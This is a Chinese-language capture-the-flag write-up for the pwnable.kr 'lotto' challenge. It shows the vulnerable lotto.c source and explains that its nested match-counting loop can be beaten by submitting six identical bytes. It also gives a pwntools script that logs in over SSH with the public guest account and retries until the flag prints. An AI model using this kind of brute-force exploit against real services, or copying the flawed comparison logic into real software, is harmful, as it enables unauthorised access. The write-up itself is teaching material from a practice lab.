又回到了熟悉得ssh连接的题目,看题目描述是一个大乐透游戏:
连上去查看文件,玩一下,顺便把lotto.c源码下载到本地:
游戏玩法大致如下,每次输入六个ascii值小于46的字符,去匹配,都匹配到即可中一等奖拿到flag:
lotto.c源码:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96
| #include <stdio.h> #include <stdlib.h> #include <string.h> #include <fcntl.h> unsigned char submit[6]; void play(){ int i; printf("Submit your 6 lotto bytes : "); fflush(stdout); int r; r = read(0, submit, 6); printf("Lotto Start!\n"); int fd = open("/dev/urandom", O_RDONLY); if(fd==-1){ printf("error. tell admin\n"); exit(-1); } unsigned char lotto[6]; if(read(fd, lotto, 6) != 6){ printf("error2. tell admin\n"); exit(-1); } for(i=0; i<6; i++){ lotto[i] = (lotto[i] % 45) + 1; } close(fd); int match = 0, j = 0; for(i=0; i<6; i++){ for(j=0; j<6; j++){ if(lotto[i] == submit[j]){ match++; } } } if(match == 6){ system("/bin/cat flag"); } else{ printf("bad luck...\n"); } } void help(){ printf("- nLotto Rule -\n"); printf("nlotto is consisted with 6 random natural numbers less than 46\n"); printf("your goal is to match lotto numbers as many as you can\n"); printf("if you win lottery for *1st place*, you will get reward\n"); printf("for more details, follow the link below\n"); printf("http://www.nlotto.co.kr/counsel.do?method=playerGuide#buying_guide01\n\n"); printf("mathematical chance to win this game is known to be 1/8145060.\n"); } int main(int argc, char* argv[]){ unsigned int menu; while(1){ printf("- Select Menu -\n"); printf("1. Play Lotto\n"); printf("2. Help\n"); printf("3. Exit\n"); scanf("%d", &menu); switch(menu){ case 1: play(); break; case 2: help(); break; case 3: printf("bye\n"); return 0; default: printf("invalid menu\n"); break; } } return 0; }
|
分析:
最开始看到随机数以及文件描述符,以为重点在这块,结果通读了一波程序,发现问题很简单,主要是下面对于值判断有利用的地方,这里两个for只要随机字符有一个和我们输入的字符都匹配那就可以完成条件,所以输入6个相同字符来暴力碰撞就可,反正提示可以尝试很多次。
这里用pwntools来写个自动化脚本,然后自动碰撞即可拿到flag:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
| from pwn import *
if __name__=="__main__": shell=ssh(host="pwnable.kr",user="lotto",port=2222,password="guest") p=shell.process("./lotto",) lottoBytes=chr(5)+chr(5)+chr(5)+chr(5)+chr(5)+chr(5) while True: data=p.recv(1024) print data if("bad luck" in data or "Select Menu" in data): p.sendline("1") else: break data=p.recv(1024) print data if("Submit your 6 lotto bytes" in data): p.sendline(lottoBytes) p.interactive()
|